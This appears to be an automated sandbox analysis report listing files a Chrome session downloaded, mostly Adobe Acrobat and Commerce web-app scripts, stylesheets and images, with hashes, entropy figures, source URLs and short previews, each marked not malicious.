                  File Type:ASCII text, with very long lines (2122)
                  Category:downloaded
                  Size (bytes):2214
                  Entropy (8bit):4.984099482014231
                  Encrypted:false
                  SSDEEP:
                  MD5:AC59F66203923A18CD33ED6D69551CAB
                  SHA1:4A930D4D9293C31123AD0B1356E7944964B281BC
                  SHA-256:47681078BFCC09E2D1C6417DAA655D78C1125A79895467C03CD0C58A1792C046
                  SHA-512:AE52699C9C1926E29E644561AFCDC97B916CD1351A5218586F52CDBF26ABB79328AE5FF7471745777364DF6E33CA1CEFAE95D2BF5FF91F2B2654A11376E397B5
                  Malicious:false
                  Reputation:unknown
                  URL:https://prod.adobeccstatic.com/unav/1.4/validator.e01d2a342312f0b605aa.bundle.js
                  Preview:/* For license information please see https://prod.adobeccstatic.com/License/LICENSE.txt */."use strict";(self.webpackChunkuniversal_nav=self.webpackChunkuniversal_nav||[]).push([["validator"],{239:(r,n,a)=>{a.r(n),a.d(n,{default:()=>e});const e=function(r){if(!r)throw new Error("UniversalNav: config is mandatory");var n=r.analyticsContext;if(!n)throw new Error("UniversalNav: analyticsContext is mandatory");if(!0!==n.disableEvents){if(!n.consumer)throw new Error("UniversalNav: analyticsContext.consumer is mandatory");if(!n.consumer.name)throw new Error("UniversalNav: analyticsContext.consumer.name is mandatory");if(!n.consumer.version)throw new Error("UniversalNav: analyticsContext.consumer.version is mandatory");if(!["Web","Desktop","Mobile"].includes(n.consumer.platform))throw new Error("UniversalNav: analyticsContext.consumer.platform is invalid");if(!["macOS","windows","linux","chromeOS","android","iOS","iPadOS","na"].includes(n.consumer.device))throw new Error("UniversalNav: analy
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (19607)
                  Category:downloaded
                  Size (bytes):19654
                  Entropy (8bit):5.228088945102343
                  Encrypted:false
                  SSDEEP:
                  MD5:08CF3C17DD8E140125F974246511E3F6
                  SHA1:C93A6C62877BBC24AE82E620E636AF5A8459EA20
                  SHA-256:ADE774150C5A6EBC75C4974E6AF2F0A22C8D166F1F4E39872F51DD56C330E82E
                  SHA-512:583A87090A33499B4449DFEC997224194129C680AC013C941B7810ED95A24B5B6EBEC58D825F0AA753496CA32D6E08FBA57D136F3D3DFA5D4DAB72BFF3DC9493
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-home2-dropin/3.52.0_2.1349.0/9163-chunk.js
                  Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},s=(new e.Error).stack;s&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[s]="8c8f845e-eaf8-44b1-936c-573a66315e99",e._sentryDebugIdIdentifier="sentry-dbid-8c8f845e-eaf8-44b1-936c-573a66315e99")}catch(e){}}();var _global="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};_global.SENTRY_RELEASE={id:"939110932eed36816ac9d538606bc3479c9c8233"},(self["webpackJsonp-home2"]=self["webpackJsonp-home2"]||[]).push([[9163],{KwqQ:(e,s,a)=>{"use strict";a.d(s,{C_:()=>isCdnFile,HM:()=>isOfSupportedFileType,HR:()=>checkFileSizePage,Vb:()=>getMimeTypeFilter,mD:()=>getFileExtension});var r=a("plsW"),o=a("4p2D"),n=a("Ob0u");const t=Object.freeze({PDF:"pdf",AI:"ai",BMP:"bmp",DOC:"doc",DOCX:"docx",FORM:"form",GIF:"gif",INDD:"indd",JPEG:"jpeg",JPG:"jpg",PNG:"png",PPT:"ppt",PPTX:"pptx",PSD:"psd",RTF:"rtf",TEXT:"text",TIF:"tif",
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (57117), with no line terminators
                  Category:downloaded
                  Size (bytes):57117
                  Entropy (8bit):5.121987234956463
                  Encrypted:false
                  SSDEEP:
                  MD5:D8E57A8ECFC2039C32FC2AAD157CEB41
                  SHA1:7B6601F6872658E8E9FBA156CF7EDCE699C6D81C
                  SHA-256:F6A6C6D3F255442D32AC4E50CF71884C65A35B814A8BFA750DF516CCA91A6DEB
                  SHA-512:AD5B193596BDD6EF6C7DE5715A33BBADF7AEE385CDA322EF3597B283534B6CC1F4B46BA71D6CE48102DE8F88B133E5ACCA3CD21BEE1DE24CC5FB87E7728F4B73
                  Malicious:false
                  Reputation:unknown
                  URL:https://client.messaging.adobe.com/latest/AdobeMessagingClient.css?clientId=dc-prod-virgoweb
                  Preview:.adbMsgClientWrapper #adbmsgContainer *, .adbMsgClientWrapper #adbmsgContainer :after, .adbMsgClientWrapper #adbmsgContainer :before{box-sizing:border-box}.adbMsgClientWrapper #adbmsgContainer .outwardAnimate{transition:opacity .3s;animation-name:a;animation-duration:.3s;animation-timing-function:cubic-bezier(0,0,.4,1);-webkit-transition:opacity .3s;-webkit-animation-name:a;-webkit-animation-duration:.3s;-webkit-animation-timing-function:cubic-bezier(0,0,.4,1);-moz-transition:opacity .3s;-moz-animation-name:a;-moz-animation-duration:.3s;-moz-animation-timing-function:cubic-bezier(0,0,.4,1)}@keyframes a{0%{transform:scale(.83);opacity:0}to{transform:scale(1);opacity:1}}.adbMsgClientWrapper #adbmsgContainer .adbmsgCtaDarkest{background-color:#1d1d1d!important;border:2px solid #a2a2a2!important;background-image:url(assets/cta_darkest.svg)!important}.adbMsgClientWrapper #adbmsgContainer .adbmsgCtaDarkest:hover{border-color:#efefef!important}.adbMsgClientWrapper #adbmsgContainer .botauthorC
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (23741)
                  Category:downloaded
                  Size (bytes):23798
                  Entropy (8bit):5.358815733680016
                  Encrypted:false
                  SSDEEP:
                  MD5:239A896B9D794E31ABC2EC4A7C77F9BF
                  SHA1:5E1CB90F924E6A1C2526048B5F2133EF2D45E61A
                  SHA-256:A40A6C74BDC7B7C1F494A957E3995CD3A6195329F44AC7D38F767924AE1BA66B
                  SHA-512:5C5803764FEFFEC9829766DBC11791AB3C1BEB81A664AC163B44EA70C6E10F04C95FA38D92CAA930B2C3E0F53ED5700A684B300CFF1ED03661395EAABF692A73
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-home2-dropin/3.52.0_2.1349.0/discover-panel-chunk.js
                  Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},t=(new e.Error).stack;t&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[t]="69b0fa45-22b9-4179-a20a-12393692e99f",e._sentryDebugIdIdentifier="sentry-dbid-69b0fa45-22b9-4179-a20a-12393692e99f")}catch(e){}}();var _global="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};_global.SENTRY_RELEASE={id:"939110932eed36816ac9d538606bc3479c9c8233"},(self["webpackJsonp-home2"]=self["webpackJsonp-home2"]||[]).push([[8731],{x3NM:(e,t,r)=>{"use strict";r.d(t,{U:()=>getFloodgateFlag});var n=r("plsW");const getFloodgateFlag=async e=>(await n.providers.floodgate()).hasFlag(e)},Ob0u:(e,t,r)=>{"use strict";r.d(t,{Eo:()=>getGenAIFeatureLimits,QB:()=>getShouldShowGenAIFreeTasteTag,SZ:()=>hasGenaiAddon,$l:()=>hasGenaiAddonQueryParam,oX:()=>isGenerativeAIAssistantEnabled,$f:()=>isGenerativeAIEditEnabled,Gn:()=>isWebFirstGenAIU
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Unicode text, UTF-8 text, with very long lines (61341), with no line terminators
                  Category:downloaded
                  Size (bytes):61387
                  Entropy (8bit):4.805165870045171
                  Encrypted:false
                  SSDEEP:
                  MD5:7A9E1A8BF8C88E5866D27AB11B1C1BA5
                  SHA1:B7C9437073550AC689969FE0E9D24731E3E205FC
                  SHA-256:1D135788674B1BE4D192CE88B0AE32F6B9DC068ACC711E720688043446235DC5
                  SHA-512:7C0B614F6469C27E9C36EE0B70D987FBEE2DD2D9FA04CB7206EA254FB08BDEBB55A5054D16D3EBE84DB6D5EA67337A0B714E4BA22A8B6FF0EC18C8B17021DC0D
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-pdfverbs-web/3.60.0_4.1247.0/translations-en-US-json.js
                  Preview:"use strict";(self["webpackJsonp-pdfverbs-web"]=self["webpackJsonp-pdfverbs-web"]||[]).push([[7818],{R5i5:e=>{e.exports=JSON.parse('{"compress.dropzone.heading.seo":"Compress a PDF","compress.dropzone.description.seo":"Drag and drop a PDF to reduce its file size with our PDF compressor.","cpdf-base.dropzone.heading.seo":"PDF converter","cpdf-base.dropzone.description.seo":"Drag and drop a PDF, Microsoft Word, Excel, PowerPoint, or image file to use our PDF converter.","cpdf-base.dropzone.description.extraSmall.seo":"Convert a PDF, Microsoft Word, Excel, PowerPoint, or image file","excel.dropzone.heading.seo":"Excel to PDF converter","excel.dropzone.description.seo":"Drag and drop a Microsoft Excel file (XLSX or XLS) to use our Excel to PDF converter.","jpg.dropzone.heading.seo":"JPG to PDF converter","jpg.dropzone.description.seo":"Drag and drop an image file (JPG, PNG, BMP, and more) to use our PDF converter.","ppt.dropzone.heading.seo":"Convert PPT to PDF","word.dropzone.heading.seo"
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:RIFF (little-endian) data, Web/P image
                  Category:dropped
                  Size (bytes):892
                  Entropy (8bit):5.863167355052868
                  Encrypted:false
                  SSDEEP:
                  MD5:41D62CA205D54A78E4298367482B4E2B
                  SHA1:839AAE21ED8ECFC238FDC68B93CCB27431CD5393
                  SHA-256:20A4A780DB0BCC047015A0D8037EB4EB58B3E5CB338673799C030A3E1B626B40
                  SHA-512:82B9806490A0DB493DA16466738437B9BB54B979075DB58C89CA0D192D780DDB5ED888E10CE76A53D48D30D5013791CAC7AB468D85B61D32766140DD53DC9044
                  Malicious:false
                  Reputation:unknown
                  Preview:RIFFt...WEBPVP8X....0.../../..ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPH=......m[..H.A.).U....A..C.u@. ....L.......;.....$3{2{....3..V6.i.W.F.h..ee^k.:..cl.Z.eb.....).IZ....!....;X.:&...hF0...kM......!W5.ak8.......#V.s...2...`..v...}.(0 p../s.'VS`SjX.B.,...v.#./I....}.b....^*1..k.:F9hgb.HgW.Q^.r}..Y5....'.JJ....&.."]<.M.Z)o.H..].i.H1..G.P>.b.{.G.\BYx*.[.y...?L....:.%.d......%.q..VP8 @...0....*0.0.>U .E..!.4.8.D...o..z...A....Z........?..z......k...
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (5348), with no line terminators
                  Category:downloaded
                  Size (bytes):5348
                  Entropy (8bit):5.314180132894648
                  Encrypted:false
                  SSDEEP:
                  MD5:F1CBF6E21E4D9D1B955D714A40B29EED
                  SHA1:BAFB6E5D2FFC6219A2C128CE30EAE8AE22C79DD1
                  SHA-256:E33FB7AE035BEE26612A682B7484D75F4C2AAD9A34CB4CD1B2C32F3C0DC79F90
                  SHA-512:06AFB0E417C401EDFD0EBFDB4D605FB51398810D97CAD700B95E5B93B1938894CC00DE376C8D3804B3E02FCE0B4326E3225F2C7B879A5993F138AB587EC43B7B
                  Malicious:false
                  Reputation:unknown
                  URL:https://commerce.adobe.com/mini-apps/_next/static/chunks/webpack-7fd263bf7dc29ed210c0.js
                  Preview:!function(){"use strict";var e={},t={};function n(r){var o=t[r];if(void 0!==o)return o.exports;var i=t[r]={id:r,loaded:!1,exports:{}},u=!0;try{e[r].call(i.exports,i,i.exports,n),u=!1}finally{u&&delete t[r]}return i.loaded=!0,i.exports}n.m=e,function(){var e=[];n.O=function(t,r,o,i){if(!r){var u=1/0;for(l=0;l<e.length;l++){r=e[l][0],o=e[l][1],i=e[l][2];for(var c=!0,a=0;a<r.length;a++)(!1&i||u>=i)&&Object.keys(n.O).every((function(e){return n.O[e](r[a])}))?r.splice(a--,1):(c=!1,i<u&&(u=i));if(c){e.splice(l--,1);var f=o();void 0!==f&&(t=f)}}return t}i=i||0;for(var l=e.length;l>0&&e[l-1][2]>i;l--)e[l]=e[l-1];e[l]=[r,o,i]}}(),n.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return n.d(t,{a:t}),t},function(){var e,t=Object.getPrototypeOf?function(e){return Object.getPrototypeOf(e)}:function(e){return e.__proto__};n.t=function(r,o){if(1&o&&(r=this(r)),8&o)return r;if("object"===typeof r&&r){if(4&o&&r.__esModule)return r;if(16&o&&"function"===typeof r.the
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Unicode text, UTF-8 text, with very long lines (23083), with no line terminators
                  Category:downloaded
                  Size (bytes):23129
                  Entropy (8bit):4.8299102319685785
                  Encrypted:false
                  SSDEEP:
                  MD5:B1CF3D5F974D119061965D0A2B442A1A
                  SHA1:57EBFC8815C84AA0562690191E6E1371CC1B241A
                  SHA-256:9EC0620D1AB2F53204FAC65BCF2686F3F1617DCE6601D5F25B27455F0B41198C
                  SHA-512:75369511EF450BC40F74714F7CB697944F7D958E3D4E0760CCE785733B6F5142A8A1A89A9F35E774CA912D323B349A1BFD57B7310F38F3384D706BF999C1A463
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-comments-dropin/3.59.4_2.1115.1/translations5-chunk.js
                  Preview:"use strict";(self["webpackJsonp-comments"]=self["webpackJsonp-comments"]||[]).push([[4264],{t39f:e=>{e.exports=JSON.parse('{"encodedContent.highlightedText":"Highlighted text","encodedContent.freehighlightedText":"Highlight","encodedContent.struckOutText":"Crossed out text","encodedContent.underlinedText":"Underlined text","encodedContent.pageLevelComment":"Page level comment","encodedContent.defaultNote":"Typed a note","encodedContent.defaultShape":"Added a drawing","encodedContent.defaultFreeText":"Added a typewriter text","encodedContent.defaultUnsupported":"Add a comment...","encodedContent.defaultReplace":"Replace selected text","encodedContent.defaultInsert":"Insert Text","notInDoc":"Not in Doc","inviteWarnMsg":"Anyone you @mention will be invited to comment on this file","accessWarnMsg":"Anyone @mentioned will need access to this document to see or reply to your comment.","invite":"Invite to this document","redhawkCommentSaveError":"We were unable to post your comment, please t
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (32744)
                  Category:downloaded
                  Size (bytes):302044
                  Entropy (8bit):5.382804286618849
                  Encrypted:false
                  SSDEEP:
                  MD5:55F3416DC12697C7152808CDCF189518
                  SHA1:EB612FD61DA2664DB2FD4EC36AAE7464AE8999FC
                  SHA-256:111C030C5EA29D5A45BC35215ACAAB9A0D272E817C147D8B277D8B3EE897CA58
                  SHA-512:1A4E9674F4340914A27BA4AEEB54E339387D48EC257F5B2292C6F21CBF5E5B5CF1DEA7E2ED90FADF03AAAA362768D9F7501DD56C9C5A5754884C23A2E69CD5D5
                  Malicious:false
                  Reputation:unknown
                  URL:https://assets.adobedtm.com/d4d114c60e50/a0e989131fd5/launch-5dd5dd2177e6.min.js
                  Preview:// For license information, see `https://assets.adobedtm.com/d4d114c60e50/a0e989131fd5/launch-5dd5dd2177e6.js`..window._satellite=window._satellite||{},window._satellite.container={buildInfo:{minified:!0,buildDate:"2025-03-20T21:37:22Z",turbineBuildDate:"2024-08-22T17:32:44Z",turbineVersion:"28.0.0"},environment:{id:"EN256774c3100e437fa6cb9e6e2af16f4f",stage:"production"},dataElements:{"digitalData.primaryUser.primaryProfile.profileInfo":{storageDuration:"pageview",modulePath:"core/src/lib/dataElements/customCode.js",settings:{source:function(){var e,t,n,o,a=window,r=a._satellite,i=r.getVar("_getNewRepeat"),s=r.getVar("_getDomain"),c=r.getVar("sha256"),d=r.getVar("serverTiming"),l=d&&"0"===d.sis,u="digitalData.primaryUser.primaryProfile.profileInfo",m="unknown",p="loggedOut";if(!(n=(t=r.DE=r.DE||{})[u])){if(o={authState:m,entitlementCreativeCloud:m,entitlementStatusCreativeCloud:m,returningStatus:i(365,"s_nr",s())},l)return o.authState=p,n=Promise.resolve(o),t[u]=n,n;(n=Promise.resolve
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (6818), with no line terminators
                  Category:downloaded
                  Size (bytes):6818
                  Entropy (8bit):5.4127214718197605
                  Encrypted:false
                  SSDEEP:
                  MD5:D3658B71BA3A9F2B53C35FB1D54AE029
                  SHA1:C06D3230F3F44538D3D33585EB41A66830CDBA2E
                  SHA-256:F9A3DBB558EF6A360F02E9FECF4A54222CD35E23F181F5218BADB3FD1F83E297
                  SHA-512:890EA5F66D232864C0788173BFC5F0D492FE5C561B0C72F339B9FA68669FEED9CF2936F85F3B2E4550ED6C303C159855E2DC7869C728EA9F5F9145AAFF2765F2
                  Malicious:false
                  Reputation:unknown
                  URL:https://commerce.adobe.com/store/_next/static/chunks/webpack-ce57c24c38108b75.js
                  Preview:!function(){"use strict";var e={},t={};function n(r){var o=t[r];if(void 0!==o)return o.exports;var a=t[r]={id:r,loaded:!1,exports:{}},i=!0;try{e[r].call(a.exports,a,a.exports,n),i=!1}finally{i&&delete t[r]}return a.loaded=!0,a.exports}n.m=e,function(){var e=[];n.O=function(t,r,o,a){if(!r){var i=1/0;for(s=0;s<e.length;s++){r=e[s][0],o=e[s][1],a=e[s][2];for(var c=!0,u=0;u<r.length;u++)(!1&a||i>=a)&&Object.keys(n.O).every((function(e){return n.O[e](r[u])}))?r.splice(u--,1):(c=!1,a<i&&(i=a));if(c){e.splice(s--,1);var f=o();void 0!==f&&(t=f)}}return t}a=a||0;for(var s=e.length;s>0&&e[s-1][2]>a;s--)e[s]=e[s-1];e[s]=[r,o,a]}}(),n.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return n.d(t,{a:t}),t},function(){var e,t=Object.getPrototypeOf?function(e){return Object.getPrototypeOf(e)}:function(e){return e.__proto__};n.t=function(r,o){if(1&o&&(r=this(r)),8&o)return r;if("object"===typeof r&&r){if(4&o&&r.__esModule)return r;if(16&o&&"function"===typeof r.the
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Unicode text, UTF-8 text, with very long lines (65535), with no line terminators
                  Category:downloaded
                  Size (bytes):456594
                  Entropy (8bit):5.49390956238856
                  Encrypted:false
                  SSDEEP:
                  MD5:C5DB296D8CB6E7DD8A215A0421BB4A3F
                  SHA1:E72F046533273464701029EA4198590275CC7508
                  SHA-256:B365F062BC4B0D239BA0DE129BFBFE6F9927EE2CF10653ABE9EC6869D301203B
                  SHA-512:C5D84C0A2C71B261504A4475A475B58CB24355584697F5CDA8018F6D2BAF603E8E7F4D611A9CFB5AB3B26EB96E7DF23F1C43FEF05B11F88B4454D0F0697EC5B1
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-genai-dropin/3.65.0_1.1122.0/4911-chunk.js
                  Preview:(self["webpackJsonp-genai"]=self["webpackJsonp-genai"]||[]).push([[4911],{TvaO:(e,t,o)=>{"use strict";o.d(t,{GM:()=>r,a$:()=>panelContextHOC,d2:()=>usePanelContext});var i=o("YWiy");const r=(0,i.createContext)({genAIClient:void 0,panelEvents:null,monetizationHandler:null}),usePanelContext=()=>(0,i.useContext)(r),panelContextHOC=e=>(0,i.forwardRef)(((t,o)=>{const r=usePanelContext();return i.createElement(e,Object.assign({ref:o},r,t))}))},Aqg8:(e,t,o)=>{"use strict";o.d(t,{A:()=>b});var i=o("plsW"),r=o("zjjr"),n=o("WsOM"),s=o("tr63"),a=o("6Eex"),l=o("PUYO"),c=o("4llJ"),d=o("lV99"),u=o("3aG4"),p=o("XuXR"),h=o("PGMW"),m=o("8dju"),I=o("8BOF"),f=o("KrNC"),y=o("54Fl"),__awaiter=function(e,t,o,i){return new(o||(o=Promise))((function(r,n){function fulfilled(e){try{step(i.next(e))}catch(e){n(e)}}function rejected(e){try{step(i.throw(e))}catch(e){n(e)}}function step(e){e.done?r(e.value):function adopt(e){return e instanceof o?e:new o((function(t){t(e)}))}(e.value).then(fulfilled,rejected)}step((
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:SVG Scalable Vector Graphics image
                  Category:dropped
                  Size (bytes):1864
                  Entropy (8bit):5.222032823730197
                  Encrypted:false
                  SSDEEP:
                  MD5:BC3D32A696895F78C19DF6C717586A5D
                  SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                  SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                  SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                  Malicious:false
                  Reputation:unknown
                  Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with no line terminators
                  Category:downloaded
                  Size (bytes):282
                  Entropy (8bit):5.1041666318009655
                  Encrypted:false
                  SSDEEP:
                  MD5:59B9D6076753F43CA028DEE9FEEA29F9
                  SHA1:E816FAB0418CDB846915289954A82FC480E06FE2
                  SHA-256:6A681EFE222B475927BA2523C484514FEED51749EAC4E4D0F4AA13A3A6094531
                  SHA-512:3B58611826DAAC44A0023F43E278120167DC5F35C0E7691F337707C2EC438F028653AF46A352D21575B5CBDDAEBA96165C4D21828FDBF67298EA59A1E46F8097
                  Malicious:false
                  Reputation:unknown
                  URL:https://commerce.adobe.com/store/_next/static/chunks/pages/commitment.265eb7cb.css
                  Preview:.Commitment__commitmentSelector__FUh_X{padding:30px 0 25px}.Banner__banner__iSqAC .Banner__top__mhBUS{margin-top:35px}.Banner__banner__iSqAC .Banner__bottom__IGEvw{margin-bottom:29px}.Banner__priceFullDisplay__pKdJE{color:#6e6e6e;color:var(--spectrum-global-color-gray-700,#6e6e6e)}
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (7653)
                  Category:downloaded
                  Size (bytes):7708
                  Entropy (8bit):5.372865704491615
                  Encrypted:false
                  SSDEEP:
                  MD5:65AD9DD9F46CC18951CFDEF8C12E7182
                  SHA1:28D6598A26E9DD9018744564588ABCFA0572165F
                  SHA-256:05294661D25E3FC47EBE90F430157DA674257706049DE561E5150A3CE38A578A
                  SHA-512:68CB9F9B6EC5C489A2CCC390011CD22D5B5D5FF4CE8260CFEE3C89AC5B6AD637B6C4EC4C8135D71A8C25F832E67F0FFACF7706569BA1AE6B979F90BFE12D0769
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-fillsign2-dropin/3.17.1_1.498.0/fs2QTverbs12-chunk.js
                  Preview:"use strict";(self["webpackJsonp-fillsign2"]=self["webpackJsonp-fillsign2"]||[]).push([[8662,1937],{R1Yb:(e,t,i)=>{i.d(t,{Fq:()=>handleFileUploadForFFD,eV:()=>initFormFieldDetection});var r=i("plsW"),o=i("6BuV"),n=i("fl0F"),s=(i("kVs5"),i("1ZEG")),a=i("Pooc"),l=i("MdHr"),c=i("8Hi4");async function initFormFieldDetection(e,t){const{assetId:i}=await l.A.getSelectedAssetId(e);i&&await c.O.initialize(i),t&&e.afterFieldDetectionInit&&e.afterFieldDetectionInit(t)}async function handleFileUploadForFFD(e,t){if(r.auth2.isSignedIn){const i=await n.K.userType();o.j.handleFileAsset(e,i,t).then((async e=>{if(1===e.selectedItems.length){const i=e.selectedItems[0],r=await n.K.getPagesAttributes();s.r$.setCurDocData({pages:r}),a.L.initialize(i.asset_id),initFormFieldDetection(t,i)}}))}}},Ii4n:(e,t,i)=>{i.d(t,{default:()=>S});var r,o=i("YWiy"),n=i("/hLX"),s=i("plsW"),a=i("1ZEG"),l=i("a3iC"),c=i("8dmp"),p=i("UpqL"),d=i("kVs5"),u=i("YDJZ"),b=i("MdHr"),f=(i("8Hi4"),i("oRsV")),y=i("q+Xp"),g=i("TOX/"),m=i("
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text
                  Category:downloaded
                  Size (bytes):1080
                  Entropy (8bit):4.689790699510367
                  Encrypted:false
                  SSDEEP:
                  MD5:67C9F7A342D53A43D682105D281898A5
                  SHA1:F4C64F1E84AD5BF0E6AAE444243109910F8E2CF9
                  SHA-256:49C3E2E7E7B589B1EB8B5E79960D457E6BFC303A30E9518B208F3DE79B0AE941
                  SHA-512:A5DAA20B6E76CEB018E759B19AFFB168A9A2FF833D81417947032F00679C707BA374409540CF438E7053CF4D1AB9F8367A4236BC5410FCEC0B7B9CA8E2949B15
                  Malicious:false
                  Reputation:unknown
                  URL:https://commerce.adobe.com/store/iframe/preload.js?cli=doc_cloud_app
                  Preview:/**********************************************************************. * ADOBE CONFIDENTIAL. * ___________________. *. * Copyright 2022 Adobe. * All Rights Reserved.. *. * NOTICE: All information contained herein is, and remains. * the property of Adobe and its suppliers, if any. The intellectual. * and technical concepts contained herein are proprietary to Adobe. * and its suppliers and are protected by all applicable intellectual. * property laws, including trade secret and copyright laws.. * Dissemination of this information or reproduction of this material. * is strictly forbidden unless prior written permission is obtained. * from Adobe.. ***********************************************************************/..(function () {. const s = document.getElementById('ucv3-preload-script').src;. const i = document.createElement('iframe');. i.style.visibility = 'hidden';. i.style.height = '0px';. i.style.width = '0px';. i.style.position = 'absolute';. i.style.border = '0';. i.sr
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:RIFF (little-endian) data, Web/P image
                  Category:downloaded
                  Size (bytes):17842
                  Entropy (8bit):7.821645806304586
                  Encrypted:false
                  SSDEEP:
                  MD5:4B52ECDC33382C9DCA874F551990E704
                  SHA1:8F3BF8E41CD4CDDDB17836B261E73F827B84341B
                  SHA-256:CCE050CC3B150C0B370751021BB15018EE2B64AC369E230FE3B571A9B00D4342
                  SHA-512:AC3D3C82BAD9147AE5F083ED49C81A744F672DDFBB262135AA3F2C6601F8DFFEA11D8E323CEF025C36D76C6F2515AA6814B622CF504CA01D13346E9EA989048F
                  Malicious:false
                  Reputation:unknown
                  URL:https://4fsv.iatrivvbe.com/uv7s6Bi03oWaXavdpthWeR527z56ovM0ZWuHmnSykj6OmknPjr4HCHnxXSZ57aYV6lrIJNef251
                  Preview:RIFF.E..WEBPVP8X....0.........ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPH.,...$.m.8..k.\.oDL.. ..TU....3'.{.g..6..2...6.DL`e..."&@..b.#&@......T.....'.....$......1.d...G........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........._...........................?...Z5[...B,.c...V-...m.0.../..?...............?.......?................_.....-...M.B.....=....C...[......w .X...ea.............VW.?b....[[.o^.Y.K...OD
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (5581), with no line terminators
                  Category:downloaded
                  Size (bytes):5581
                  Entropy (8bit):4.375419954367691
                  Encrypted:false
                  SSDEEP:
                  MD5:DAADC1F70E12B676F13670B726880BF9
                  SHA1:0D0D7D857A2B0589F8E91BFFDCAD5D9F0F14114F
                  SHA-256:5E851AF883E584192E66686DA2967A13576FF86D1D407F5F7B22CC8844AA7BFD
                  SHA-512:4494C4158A09E0A746F65405F6130B1AD14DC73F54AC416C463A48A35D7003CBFFF37B4B55453F5996B2FB11630127B2C845D16798BBA0D46F67E9E3AAC9B261
                  Malicious:false
                  Reputation:unknown
                  URL:https://commerce.adobe.com/mini-apps/_next/static/chunks/styles-5f7754c5b2cfbef6cd00.js
